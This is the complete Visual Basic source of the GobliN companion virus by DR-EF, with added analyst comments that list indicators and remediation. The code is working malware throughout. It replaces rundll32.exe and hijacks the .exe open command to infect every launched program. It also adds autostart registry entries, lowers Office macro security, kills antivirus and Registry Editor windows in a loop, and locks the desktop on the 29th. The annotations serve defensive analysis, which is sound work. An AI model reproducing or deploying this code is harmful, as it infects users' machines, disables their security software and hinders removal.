Contribution - W32.hllc.GobliN    [by DR-EF]
[executable virus in a zip archive]

  

'**********************************************************
'W32.hllc.GobliN by DR-EF (c) 2002 all right reserved !!! *
'Goblin is a Companion virus infect exe files.the virus   *
'infect programs when the program run this virus also have*
'a nice graphical payload.                                *
'**********************************************************
' Analyst note: Win32 imports used by this sample. Taken together they are a
' useful static indicator for triage: process hiding (RegisterServiceProcess),
' process handle/termination calls (OpenProcess, TerminateProcess, CloseHandle),
' and window lookup plus message posting (FindWindowA, PostMessageA), which
' DisableAV below uses against security-tool windows.
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessId As Long, ByVal dwType As Long) As Long
Private Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
' Module-level Variant (no type given); assigned the running copy's full path
' by get_goblin_path and read by Disease_effect and infect_file.
Dim virus_path
' Entry point: runs when the form loads. The call order below is the sample's
' whole life cycle: hide the process, record its own path, install persistence
' (Disease_effect), run the date-gated payload, then the companion step that
' launches the original host program (infect_file).
' Residency: only a copy whose executable name is "rundll32" (the name
' Disease_effect installs under c:\windows) and that is the first instance
' continues into Protect; every other copy ends here.
Private Sub Form_Load() 'main of virus:
Call hide_goblin
Call get_goblin_path
Call Disease_effect
Call payload
Call infect_file
If LCase(App.EXEName) = "rundll32" Then
' A second instance of the resident copy exits immediately.
If App.PrevInstance = True Then End
Call Protect
Else
End
End If
End Sub
' Date-triggered visual payload. Returns immediately unless the system
' day-of-month is 29. On that day it hides the mouse cursor, shows Form1 with a
' black background and alternates two messages (switching roughly every five
' seconds, tracked via Second(Time)), while beeping and sending Esc keystrokes.
' Analyst notes:
'  - No file or registry modification is visible in this routine.
'  - The loop at label x has no exit in this block (unconditional GoTo x and
'    On Error Resume Next), so as written the calls that follow payload in
'    Form_Load are not reached on the trigger day. Combined with the .exe open
'    command redirection written by Disease_effect, a visible symptom on day 29
'    would be programs failing to start - confirm in a sandbox before relying on it.
'  - In "Dim m, h, t As Boolean" only t is Boolean; m and h are Variants.
Sub payload() 'virus payload:
On Error Resume Next
If Day(Date) <> 29 Then Exit Sub
Dim m, h, t As Boolean
ShowCursor 0
Form1.BackColor = vbBlack
Form1.Label1.ForeColor = vbRed
Form1.Label1.BackColor = vbbblack
Load Form1
Form1.Show
' h is the second-of-minute at which the current message phase ends; m is "now".
h = Second(Time) + 5
m = Second(Time)
x:
DoEvents
' t selects which of the two messages is shown in the current phase.
If t = False Then
If m < h Then
Form1.Label1.FontSize = 45
Form1.Label1.Caption = ".-=w32.Hllc.GobliN=-." & vbCrLf & _
"CopyRight To DR-EF" & vbCrLf & "All Right Reseved !!!"
Label1.ForeColor = vbRed
m = Second(Time)
Else
t = True
h = Second(Time) + 5
End If
Else
If m < h Then
Label1.ForeColor = vbYellow
Form1.Label1.FontSize = 70
Form1.Label1.Caption = "GobliN VIRUS !!!"
m = Second(Time)
Else
t = False
h = Second(Time) + 5
End If
End If
' Re-base both counters when they run past the end of the minute.
If h > 59 Then h = Second(Time) + 5
If m > 59 Then m = Second(Time)
Beep
' Esc keystrokes plus SetFocus keep the form in front; the user-visible effect
' is an unresponsive desktop while the loop runs.
SendKeys "{Esc}"
DoEvents
Form1.SetFocus
DoEvents
GoTo x
End Sub
' Installation / persistence routine. Also re-run from the form's QueryUnload,
' Unload and Terminate handlers, so the changes are re-applied on shutdown.
'
' Host indicators an investigator can look for (all literal in this block):
'  - c:\windows\rundll32.GbN (hidden): backup of the original rundll32.exe
'  - c:\windows\rundll32.exe (hidden): replaced with a copy of the sample
'  - c:\Goblin_disease.reg: temporary file, imported silently and then deleted
'  - HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices value
'    "Goblin_By_DR-EF" pointing at c:\windows\rundll32.exe
'  - HKCR\exefile\shell\open\command default redirected through
'    c:\windows\RunDll32.exe, so every .exe launch is routed via the sample
'  - HKCU values under Kazaa\ResultsFilter, Explorer\Advanced, and
'    Office 8.0-10.0 Word/Excel Security
'
' Remediation outline: restore rundll32.exe from the .GbN backup (or from
' trusted media), reset the exefile open command to the OS default ("%1" %*),
' remove the RunServices value, and review the listed HKCU values.
Sub Disease_effect() 'virus install:
On Error Resume Next
' First-run check: install only if the hidden backup copy does not exist yet.
If Dir("c:\windows\Rundll32.GbN", vbHidden) = "" Then
FileCopy "c:\windows\rundll32.exe", "c:\windows\rundll32.GbN"
FileCopy virus_path, "c:\windows\Rundll32.exe"
SetAttr "c:\windows\rundll32.GbN", vbHidden
SetAttr "c:\windows\rundll32.exe", vbHidden
End If
' t holds a double-quote character used to build the .reg file lines.
t = Chr(34)
Open "c:\Goblin_disease.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1, ""
' Kazaa result filter setting - presumably turns off its virus filtering of
' search results; confirm against Kazaa documentation.
Print #1, "[HKEY_CURRENT_USER\Software\Kazaa\ResultsFilter]"
Print #1, t & "virus_filter" & t & "=dword:00000000"
Print #1, ""
' Explorer "Hidden" view setting - presumably meant to keep the hidden .GbN
' files out of Explorer listings; exact meaning of 0 depends on OS version.
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"
Print #1, ""
Print #1, t & "Hidden" & t & "=dword:00000000"
' Office 8.0, 9.0 and 10.0: lines targeting Word and Excel macro-security
' values (Level, AccessVBOM, DontTrustInstalledFiles). Intended effect appears
' to be lowering macro security; verify which values actually import.
For i = 8 To 10
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\" & i & ".0\Word\Security]"
Print #1, t & "Level" & "=dword:00000001"
Print #1, t & "AccessVBOM" & t & "=" & t & "1" & t
Print #1, t & "DontTrustInstalledFiles" & t & "=dword:00000001"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\" & i & ".0\Excel\Security]"
Print #1, """Level""=dword:00000001"
Next i
Print #1, ""
' Execution hijack: the emitted default value is
' "c:\windows\RunDll32.exe" %1 %* - the target program and its arguments are
' handed to the replaced rundll32.exe (see infect_file, file and parm).
Print #1, "[HKEY_CLASSES_ROOT\exefile\shell\open\command]"
Print #1, "@=" & t & "\" & t & "c:\\windows\\RunDll32.exe\" & _
t & " %1 %*" & t
' Autostart entry for the replaced rundll32.exe.
Print #1, "[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]"
Print #1, t & "Goblin_By_DR-EF" & t & "=" & t & "c:\\windows\\rundll32.exe" & t
Close #1
Dim Reg As Long, RegHandle As Long
' Silent import (/s suppresses regedit's prompts) in a hidden window; a
' "regedit /s" child process of a non-installer parent is a detection signal.
Reg = Shell("regedit /s c:\goblin_disease.reg", vbHide)
' &H100000 is the SYNCHRONIZE access right.
RegHandle = OpenProcess(&H100000, False, Reg)
' The .reg file is deleted right after the import is started, so it may only
' be recoverable from disk forensics.
Kill "c:\goblin_disease.reg"
DoEvents
TerminateProcess RegHandle, 0
CloseHandle RegHandle
End Sub
'***********File Infection Engine*******************
' Companion-infection and host-launch step.
'  - Running as "rundll32" (i.e. started through the redirected .exe open
'    command): takes the target program path from the command line (file),
'    and if no hidden <name>.GbN exists next to it, renames the original
'    program to <name>.GbN, copies the sample to the original .exe name, hides
'    the renamed original, then starts the original with its arguments (parm).
'  - Running under any other name (an already-placed companion): derives the
'    host name from its own path (.exe -> .GbN) and starts it.
' The original program is renamed, not modified, so cleanup of an affected
' directory is: remove the companion .exe and rename the hidden .GbN file back
' to .exe. Hidden *.GbN files next to same-named .exe files are the on-disk
' indicator.
Sub infect_file() 'stupid code but work good
On Error GoTo Error
If LCase(App.EXEName) = "rundll32" Then
' Strips the last four characters of the value returned by file (which ends
' at the space following ".exe") and appends "GbN".
host = Mid(file, 1, Len(file) - 4) & "GbN"
If Dir(host, vbHidden) = "" Then
DoEvents
Name file As host
FileCopy virus_path, file
SetAttr host, vbHidden
Shell host & " " & parm, vbNormalFocus
Else
' Already has a companion: just run the preserved original.
Shell host & " " & parm, vbNormalFocus
End If
Else
host = Mid(virus_path, 1, Len(virus_path) - 3) & "GbN"
Shell host & " " & parm, vbNormalFocus
End If
Exit Sub
' Fallback paths keyed on the VB runtime error number: 5 is "Invalid procedure
' call or argument", 75 is "Path/File access error". Each branch tries to start
' a program from the command line or the sample's own .GbN host instead.
Error:
Select Case Err.Number
Case Is = 5
host = Mid(virus_path, 1, Len(virus_path) - 3) & "GbN"
Shell host & " " & Command, vbNormalFocus
Case Is = 75
Shell Command, vbNormalFocus
Case Else
If Command = "" Then Exit Sub
Shell comamnd, vbNormalFocus
End Select
End Sub
' Returns the argument portion of the process command line: scans Command for
' the first occurrence of ".exe " (case-insensitive) and returns everything
' from that trailing space onward. If no such occurrence is found, the whole
' command line is returned.
Function parm() As String 'programs parameters:
For i = 1 To Len(Command)
' Left(Command, i) ends in ".exe " exactly when position i is the space
' following the first ".exe".
If LCase(Right(Left(Command, i), 5)) = ".exe " Then
parm = Mid(Command, i, Len(Command))
Exit For
End If
Next i
If parm = "" Then parm = Command
End Function
' Returns the program-path portion of the process command line: the prefix of
' Command up to and including the space that follows the first ".exe"
' (case-insensitive match). This is the path infect_file renames and replaces.
' If no ".exe " is found, s is never assigned - presumably yielding an empty
' string; verify under the VB6 runtime.
Function file() 'file to run\infect:
For i = 1 To Len(Command)
scan = LCase(Mid(Command, 1, i))
If Right(scan, 5) = ".exe " Then
s = i
Exit For
End If
Next i
file = Left(Command, s)
End Function
' Stores the full path of the running executable in the module-level
' virus_path, built from App.Path and App.EXEName plus ".exe". The branch only
' avoids a doubled backslash when App.Path already ends in one (e.g. a drive root).
Sub get_goblin_path() 'goblin path:
If Right(App.Path, 1) = "\" Then
virus_path = App.Path & App.EXEName & ".exe"
Else
virus_path = App.Path & "\" & App.EXEName & ".exe"
End If
End Sub
'***************anti easy remove********************
' Re-applies the installation routine when the form is asked to unload, so
' file and registry changes removed while the process is running are written
' again on close. Remediation therefore has to stop the process first.
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Call Disease_effect
End Sub
' Re-applies the installation routine when the form terminates; same
' persistence-reassertion purpose as the QueryUnload and Unload handlers.
Private Sub Form_Terminate()
Call Disease_effect
End Sub
' Process-hiding step. Calls RegisterServiceProcess with the current process id
' and type 1; this kernel32 export is specific to Windows 9x, where a process
' registered as a service is omitted from the Ctrl+Alt+Del task list. Also
' clears App.TaskVisible and hides the form, so no window or task entry is
' shown. Detection therefore needs a process lister that does not rely on the
' standard task list.
Sub hide_goblin()
Dim Goblin As Long
Goblin = GetCurrentProcessId
RegisterServiceProcess Goblin, 1
App.TaskVisible = False
Form1.Hide
End Sub
' Re-applies the installation routine when the form unloads; same
' persistence-reassertion purpose as the QueryUnload and Terminate handlers.
Private Sub Form_Unload(Cancel As Integer)
Call Disease_effect
End Sub
' Resident self-defence loop. Runs only in the first instance of the copy named
' "rundll32". It repeatedly calls DisableAV for a fixed list of window titles -
' antivirus products and "Registry Editor" - in an endless loop (GoTo x), with
' DoEvents between passes.
' Analyst notes: the list matches on exact window title, and a symptom on an
' affected host is that the listed tools, including regedit, close right after
' opening. The title list can be reused as strings for static signatures.
Sub Protect()
If App.PrevInstance = True Then End
If LCase(App.EXEName) <> "rundll32" Then Exit Sub
x:
DisableAV "AVP Monitor"
DisableAV "AntiViral Toolkit Pro"
DisableAV "vsstat"
DisableAV "Iomon98"
DisableAV "Vshwin"
DisableAV "Anti-virus"
DisableAV "Esafe"
DisableAV "F-Secure Anti-Virus"
DisableAV "antivirus"
DisableAV "Navapw32"
DisableAV "Norton AntiVirus"
' Closing the Registry Editor window hinders manual removal of the keys
' written by Disease_effect.
DisableAV "Registry Editor"
DoEvents
GoTo x
End Sub
' Looks up a top-level window by its title (any class) and, if one is found,
' posts message &H12 (WM_QUIT) to it. Returns without action when no such
' window exists; errors are suppressed.
' AV_Window: window title to match, passed to FindWindow as lpWindowName.
' Detection angle: a user-mode process posting WM_QUIT to windows owned by
' other processes, especially security tools, is anomalous behaviour.
Sub DisableAV(AV_Window)
On Error Resume Next
Dim AvWnd As Long
AvWnd = FindWindow(vbNullString, AV_Window)
If AvWnd = 0 Then Exit Sub
PostMessage AvWnd, &H12, 0, 0
End Sub
'****************************************************